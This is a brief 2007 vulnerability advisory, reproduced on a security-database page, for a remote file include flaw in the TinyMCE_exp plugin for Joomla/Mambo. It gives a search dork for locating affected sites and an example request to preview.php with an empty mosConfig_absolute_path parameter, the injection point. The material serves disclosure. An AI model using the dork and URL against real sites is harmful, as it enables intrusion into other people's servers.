Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:16327
HistoryMar 12, 2007 - 12:00 a.m.

[Full-disclosure] TinyMCE_exp Remote File Include Vulnerability

2007-03-1200:00:00
vulners.com
12

###########################################################################
TinyMCE_exp Remote File Include Vulnerability

Author: Arturo Z.
Contact: [email protected]
Website: www.diosdelared.com
Date: 10/03/07
Risk: critical
Vendor Url:
http://www.joomlaya.com/index.php?option=com_remository&func=fileinfo&filecatid=1868
Affected Software: TinyMCE_exp
search: allinurl: tiny_mce

example
##################################################################

http://site.com/path/mambots/editors/path/jscripts/tiny_mce/plugins/preview/preview.php?mosConfig_absolute_path=

##################################################################